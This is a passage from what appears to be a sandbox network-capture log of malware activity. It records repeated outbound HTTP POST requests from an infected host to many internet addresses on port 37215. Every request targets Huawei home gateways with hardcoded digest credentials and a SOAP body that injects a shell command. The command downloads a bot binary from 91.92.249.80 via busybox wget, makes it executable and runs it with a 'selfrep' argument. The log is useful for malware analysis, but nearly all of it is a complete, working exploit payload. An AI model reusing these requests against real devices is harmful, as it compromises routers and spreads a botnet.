                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1917192.168.2.2333940197.120.28.12437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.560848951 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1918192.168.2.2337170197.239.110.19437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.560890913 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1919192.168.2.233568041.28.240.14837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.560904980 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1920192.168.2.2353394197.118.139.1937215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.560936928 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1921192.168.2.235468041.178.250.9837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.560939074 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1922192.168.2.2339968181.115.240.20437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.560993910 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1923192.168.2.2346224197.81.150.11237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.561002016 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1924192.168.2.234899441.69.253.18837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.561034918 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1925192.168.2.2334868197.57.52.14137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.561068058 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1926192.168.2.235218041.250.82.14637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:02.561083078 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
